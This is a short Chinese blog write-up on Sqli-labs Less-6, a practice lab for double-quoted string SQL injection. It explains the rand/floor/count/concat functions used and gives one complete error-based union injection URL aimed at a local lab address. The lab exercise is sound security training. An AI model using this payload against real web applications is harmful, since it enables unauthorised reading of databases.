zoukankan      html  css  js  c++  java
  • Sqli-labs

    GET - Double Injection - Double Quotes - String(双引号的双注入)

    步骤和上面一题一致,只是变成双引号

    这次不妨换一种注法

    rand()生成介于0~1之间的随机数
    floor()向下舍入为指定小数位数
    count()函数返回指定的值的数目
    concat()将多个字符串连接成一个字符串
    group by根据要求对结果排序
    
    
    http://192.168.147.133/Less-6/?id=0" union select count(*),2,concat(':',(select database()),':',floor(rand()*2))as a from information_schema.tables group by a%23
    

    说实话这种普通注入,没有过滤的话用sqlmap最简单

    [Sign]做不出ctf题的时候很痛苦,你只能眼睁睁看着其他人领先你
  • 相关阅读:
    6-2 铁轨 uva 514
    并查集基础
    周练7
    周练5
    周练4
    二分查找
    周练3
    2-7 使用不同方式进行定位.py
    2-6 使用title_contains检查页面是否正确
    启用不同浏览器.py
  • 原文地址:https://www.cnblogs.com/echoDetected/p/12830952.html
Copyright © 2011-2022 走看看